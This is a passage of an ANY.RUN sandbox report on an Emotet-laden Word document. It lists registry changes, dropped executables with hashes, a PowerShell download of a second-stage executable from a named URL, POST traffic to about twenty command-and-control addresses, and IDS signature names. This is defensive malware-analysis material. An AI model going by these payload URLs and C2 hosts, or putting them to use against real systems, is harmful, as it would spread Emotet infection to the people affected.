(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: SimSun-ExtB
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Small Fonts
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Snap ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Stencil
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Sylfaen
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Symbol
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: System
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Tahoma
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Tempus Sans ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Terminal
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Times New Roman
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Traditional Arabic
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Trebuchet MS
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Tunga
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Tw Cen MT
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Tw Cen MT Condensed
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Tw Cen MT Condensed Extra Bold
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 36/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Utsaah
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Vani
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Verdana
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Vijaya
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Viner Hand ITC
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Vivaldi
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Vladimir Script
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Vrinda
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Webdings
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Wide Latin
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Wingdings
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Wingdings 2
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Wingdings 3
Value: 0
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Operation: write Name: Yet R
Value: 0
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write Name: CachePrefix
Value:
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write Name: CachePrefix
Value: Cookie:
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write Name: CachePrefix
Value: Visited:
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation: write Name: ProxyEnable
Value: 0
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation: write Name: SavedLegacySettings
Value: 460000003B010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016400000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 37/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F776137C-8E37-487A-9B33-
95FF0AD42602}
Operation: write Name: WpadDecisionReason
Value: 1
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F776137C-8E37-487A-9B33-
95FF0AD42602}
Operation: write Name: WpadDecisionTime
Value: AD686852DB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F776137C-8E37-487A-9B33-
95FF0AD42602}
Operation: write Name: WpadDecision
Value: 0
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F776137C-8E37-487A-9B33-
95FF0AD42602}
Operation: write Name: WpadNetworkName
Value: Network 3
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-36-3e-ff
Operation: write Name: WpadDecisionReason
Value: 1
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-36-3e-ff
Operation: write Name: WpadDecisionTime
Value: AD686852DB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-36-3e-ff
Operation: write Name: WpadDecision
Value: 0
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-36-3e-ff
Operation: write Name: WpadDetectedUrl
Value:
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F776137C-8E37-487A-9B33-
95FF0AD42602}
Operation: write Name: WpadDecisionTime
Value: 093D1B5BDB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-36-3e-ff
Operation: write Name: WpadDecisionTime
Value: 093D1B5BDB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-36-3e-ff
Operation: delete value Name: WpadDetectedUrl
Value:
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
Operation: write Name: LastPurgeTime
Value: 27137755
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F776137C-8E37-487A-9B33-
95FF0AD42602}
Operation: write Name: WpadDecisionTime
Value: BDFBA783DB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-36-3e-ff
Operation: write Name: WpadDecisionTime
Value: BDFBA783DB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F776137C-8E37-487A-9B33-
95FF0AD42602}
Operation: write Name: WpadDecisionTime
Value: E3E0469DDB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-36-3e-ff
Operation: write Name: WpadDecisionTime
Value: E3E0469DDB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F776137C-8E37-487A-9B33-
95FF0AD42602}
Operation: write Name: WpadDecisionTime
Value: 27A5AEB9DB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-36-3e-ff
Operation: write Name: WpadDecisionTime
Value: 27A5AEB9DB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F776137C-8E37-487A-9B33-
95FF0AD42602}
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 38/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Operation: write Name: WpadDecisionTime
Value: 9B5347EADB8AD701
(PID) Process: (3164) regidle.exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-36-3e-ff
Operation: write Name: WpadDecisionTime
Value: 9B5347EADB8AD701
Files activity
Executable files Suspicious files Text files Unknown types
2 3 0 3
Dropped files
PID Process Filename Type
2728 WINWORD.EXE C:\Users\admin\AppData\Local\Temp\CVR442C.tmp.cvr —
MD5: — SHA256: —
3828 POwersheLL.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms binary
MD5: FF2E5687F6AE82AD7D5766EF1959944F SHA256: B4985E762E7471F122F8D6A9B7FF91E810B644CB827469EA77736E5A6107ED01
3828 POwersheLL.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FIT0N66RBH0VW9F6ARSX.temp binary
MD5: FF2E5687F6AE82AD7D5766EF1959944F SHA256: B4985E762E7471F122F8D6A9B7FF91E810B644CB827469EA77736E5A6107ED01
2728 WINWORD.EXE C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm pgc
MD5: 475553794AFCEFEC9B9C775CB4B7A133 SHA256: EDA472127C813AD9BAE1D0D5575D8FAA2B95568639563D81408EDB4C71962BA5
3828 POwersheLL.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations- binary
ms~RF2b495c.TMP
MD5: FF2E5687F6AE82AD7D5766EF1959944F SHA256: B4985E762E7471F122F8D6A9B7FF91E810B644CB827469EA77736E5A6107ED01
2728 WINWORD.EXE C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd tlb
MD5: CC11BFD14D6ECC83477B69FF06C6C587 SHA256: A4E8F5821887AC26449C33D9B027CE31BE0E7203DD035C5DC7D34A9AEF01A6DA
2728 WINWORD.EXE C:\Users\admin\AppData\Local\Temp\~$O-100120 CDW-102220.doc pgc
MD5: 2E7A3442236F2D50C669BC79188BBD69 SHA256: BF007001BACF8F6ABF371B0B2797B7D13B741879E1E5B76FB616A934318418A9
3828 POwersheLL.exe C:\Users\admin\Jehhzda\Ben14fr\G_jugk.exe executable
MD5: 92F58C4E2F524EC53EBE10D914D96CCB SHA256: 4A9E32BC5348265C43945ADAAF140B98B64329BD05878BC13671FA916F423710
1640 G_jugk.exe C:\Users\admin\AppData\Local\photowiz\regidle.exe executable
MD5: 92F58C4E2F524EC53EBE10D914D96CCB SHA256: 4A9E32BC5348265C43945ADAAF140B98B64329BD05878BC13671FA916F423710
Network activity
HTTP(S) requests TCP/UDP connections DNS requests Threats
18 25 4 27
HTTP requests
PID Process Method HTTP Code IP URL CN Type Size Reputation
3164 regidle.exe POST — 200.116.145.225:443 http://200.116.145.225:443/x4VtVzvRhVPEyfB/Xq02AK6oEV CO — — malicious
t/
3164 regidle.exe POST — 96.126.101.6:8080 http://96.126.101.6:8080/VDpVH/OUmWd7VBXpU7L/VxWud US — — malicious
uF/zT560LD/f6oH6uVWDWqAsckvA/U3LgE/
3828 POwersheLL.exe GET 404 69.65.3.162:80 http://eubanks7.com/administrator/ubdDbB/ US html 315 b suspicious
3828 POwersheLL.exe GET 200 35.214.215.33:80 http://lidoraggiodisole.it/cgi-bin/zLG879/ US executable 368 Kb malicious
3164 regidle.exe POST 404 5.196.108.185:8080 http://5.196.108.185:8080/VznUAWLqI/pARcFNvv/EWIHClK FR html 564 b malicious
Kbva6/zQVAdPyKoQYwu/G2AcsRRGqJEa3/QNV1u3DgLR5d
ntG/
3164 regidle.exe POST — 167.114.153.111:8080 http://167.114.153.111:8080/OxYV/8zgZIoGYStRl/Jk8OOBe/ CA — — malicious
HRAZSzsYY/9IpMzzRmtoHM/
3164 regidle.exe POST — 194.187.133.160:443 http://194.187.133.160:443/Nqdlz/w2BG/ BG — — malicious
3164 regidle.exe POST — 103.86.49.11:8080 http://103.86.49.11:8080/VCvOqXMjgEehauu/AyEp/O9Qn2/ TH — — malicious
R6Rj7Gw9eOv6yJ/fC5a36YfopGe/Q2AwYvSohZiyaEtbbo/
3164 regidle.exe POST — 98.174.164.72:80 http://98.174.164.72/ghMuzyNCNWN/kMmYdVIthxeVy/o2fe US — — malicious
o8eu7Jyv/O2M8WIf9SpyCp/yLVEV96eosyd5URJ477/8wdGX
dz9k9hhJjWp/
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 39/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
3164 regidle.exe POST — 78.24.219.147:8080 http://78.24.219.147:8080/jCOc/oQQPMafJlpMi6n3/Pbao/K RU — — malicious
7oB22aAUKQ6lA6r/GoOMY/
3164 regidle.exe POST — 50.245.107.73:443 http://50.245.107.73:443/ukXcIsljsvd7W/h2VQlYqB/csuQkg US — — malicious
UqlkakMvQRJ9/NCjJodG/
3164 regidle.exe POST 404 110.145.77.103:80 http://110.145.77.103/QZvVQ6o1I/DYk9QgXU/HtoxMCRHbY AU xml 345 b malicious
CJhgamW/5NsCejn3/
3164 regidle.exe POST — 46.105.131.79:8080 http://46.105.131.79:8080/oV2K/XHZup/CTQWFKqxFlT0oqD FR — — malicious
Wogh/
3164 regidle.exe POST — 94.200.114.161:80 http://94.200.114.161/v0tIQ4Z5/R84ag0nc0dg3odC/zvUg/ AE — — malicious
3164 regidle.exe POST — 61.19.246.238:443 http://61.19.246.238:443/pwYYgXxoA7/ TH — — malicious
3164 regidle.exe POST — 102.182.93.220:80 http://102.182.93.220/aslObAT/aWCxrvfEoB/ ZA — — malicious
3164 regidle.exe POST — 209.54.13.14:80 http://209.54.13.14/C3HFrnFtzRKRsRMD/ US — — malicious
3164 regidle.exe POST — 186.70.56.94:443 http://186.70.56.94:443/PW0uy1xAyA/ EC — — malicious
Connections
PID Process IP Domain ASN CN Reputation
3164 regidle.exe 167.114.153.111:8080 — OVH SAS CA malicious
3164 regidle.exe 194.187.133.160:443 — Blizoo Media and Broadband BG malicious
3164 regidle.exe 103.86.49.11:8080 — Bangmod Enterprise Co., Ltd. TH malicious
3164 regidle.exe 5.196.108.185:8080 — OVH SAS FR malicious
3164 regidle.exe 98.174.164.72:80 — Cox Communications Inc. US malicious
3828 POwersheLL.exe 69.65.3.162:80 eubanks7.com GigeNET US suspicious
3164 regidle.exe 200.116.145.225:443 — EPM Telecomunicaciones S.A. E.S.P. CO malicious
3828 POwersheLL.exe 35.214.215.33:80 lidoraggiodisole.it — US suspicious
3164 regidle.exe 78.24.219.147:8080 — JSC ISPsystem RU malicious
3164 regidle.exe 50.245.107.73:443 — Comcast Cable Communications, LLC US malicious
3164 regidle.exe 96.126.101.6:8080 — Linode, LLC US malicious
3164 regidle.exe 94.200.114.161:80 — Emirates Integrated Telecommunications AE malicious
Company PJSC (EITC-DU)
3164 regidle.exe 209.54.13.14:80 — New Wave Communications US malicious
3164 regidle.exe 61.19.246.238:443 — The Communication Authoity of Thailand, CAT TH malicious
3164 regidle.exe 110.145.77.103:80 — Telstra Pty Ltd AU malicious
3164 regidle.exe 186.70.56.94:443 — Satnet EC malicious
3164 regidle.exe 46.105.131.79:8080 — OVH SAS FR malicious
3164 regidle.exe 102.182.93.220:80 — — ZA malicious
3164 regidle.exe 142.112.10.95:20 — Bell Canada CA malicious
3164 regidle.exe 194.4.58.192:7080 — — — malicious
— — 142.112.10.95:20 — Bell Canada CA malicious
DNS requests
Domain IP Reputation
eubanks7.com 69.65.3.162 suspicious
erkala.com — whitelisted
lidoraggiodisole.it 35.214.215.33 malicious
dns.msftncsi.com 131.107.255.255 shared
Threats
PID Process Class Message
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 40/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
3828 POwersheLL.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
3828 POwersheLL.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3828 POwersheLL.exe Misc activity ET INFO EXE - Served Attached HTTP
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
Debug output strings
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2023 ANY.RUN LLC. ALL RIGHTS RESERVED
General Info
File name: CMO-100120 CDW-102220.doc
Full analysis: https://app.any.run/tasks/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19
Verdict: Malicious activity
Threats: Emotet
Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even
private users get infected in mass spam email campaigns.
Analysis date: August 06, 2021, 15:53:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros macros-on-open generated-doc emotet-doc emotet loader trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Minima., Author: Mael Schneider, Template: Normal.dotm, Last Saved By: Noa Masson,
Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Oct 22 07:54:00 2020, Last Saved Time/Date: Thu Oct 22 07:54:00 2020, Number of Pages: 1,
Number of Words: 3675, Number of Characters: 20950, Security: 8
MD5: 27E3A6A2A661389C26F2CA9CBF39CC0F
SHA1: 91257B16C8EA0A0C236F9824672ABF04E118C5C9
SHA256: E2D2EBAFC33D7C7819F414031215C3669BCCDFB255AF3CBE0177B2C601B0E0CD
SSDEEP: 3072:aJivKie6B/w2yiWydwLQ/qR+zAf0Yjau23RW9Wn:aJiP/w2PtqReAf0YjARW9
Software environment set and analysis options
Launch configuration
Task duration: 300 seconds Heavy Evasion option: off Network geolocation: off
Additional time used: 240 seconds MITM proxy: off Privacy: Public submission
Fakenet option: off Route via Tor: off Autoconfirmation of UAC: on
Network: on
Software preset Hotfixes
Internet Explorer 11.0.9600.19596 KB4534251 Client LanguagePack Package
Adobe Acrobat Reader DC (20.013.20064) Client Refresh LanguagePack Package
Adobe Flash Player 32 ActiveX (32.0.0.453) CodecPack Basic Package
Adobe Flash Player 32 NPAPI (32.0.0.453) Foundation Package
Adobe Flash Player 32 PPAPI (32.0.0.453) IE Hyphenation Parent Package English
Adobe Refresh Manager (1.8.0) IE Spelling Parent Package English
CCleaner (5.74) IE Troubleshooters Package
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 41/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
FileZilla Client 3.51.0 (3.51.0) InternetExplorer Optional Package
Google Chrome (86.0.4240.198) InternetExplorer Package TopLevel
Google Update Helper (1.3.36.31) KB2479943
Java 8 Update 271 (8.0.2710.9) KB2491683
Java Auto Updater (2.8.271.9) KB2506212
Microsoft .NET Framework 4.5.2 (4.5.51209) KB2506928
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000) KB2532531
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000) KB2533552
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000) KB2533623
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000) KB2534111
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000) KB2545698
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000) KB2547666
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2552343
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000) KB2560656
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000) KB2564958
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013) KB2574819
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000) KB2579686
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000) KB2585542
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000) KB2604115
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000) KB2620704
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000) KB2621440
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000) KB2631813
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000) KB2639308
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2640148
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000) KB2653956
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000) KB2654428
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013) KB2656356
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000) KB2660075
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000) KB2667402
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000) KB2676562
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000) KB2685811
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000) KB2685813
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2685939
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000) KB2690533
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000) KB2698365
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013) KB2705219
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000) KB2719857
Microsoft Office IME (Korean) 2010 (14.0.4763.1000) KB2726535
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000) KB2727528
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000) KB2729094
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000) KB2729452
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000) KB2731771
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000) KB2732059
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2736422
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000) KB2742599
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000) KB2750841
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013) KB2758857
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000) KB2761217
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000) KB2770660
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000) KB2773072
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000) KB2786081
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000) KB2789645
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000) KB2799926
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000) KB2800095
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000) KB2807986
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013) KB2808679
Microsoft Office O MUI (French) 2010 (14.0.4763.1000) KB2813347
Microsoft Office O MUI (German) 2010 (14.0.4763.1000) KB2813430
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000) KB2820331
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000) KB2834140
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000) KB2836942
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2836943
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000) KB2840631
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000) KB2843630
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013) KB2847927
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000) KB2852386
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000) KB2853952
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000) KB2857650
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000) KB2861698
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000) KB2862152
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000) KB2862330
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 42/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2862335
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000) KB2864202
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000) KB2868038
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013) KB2871997
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000) KB2884256
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000) KB2891804
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000) KB2893294
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000) KB2893519
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000) KB2894844
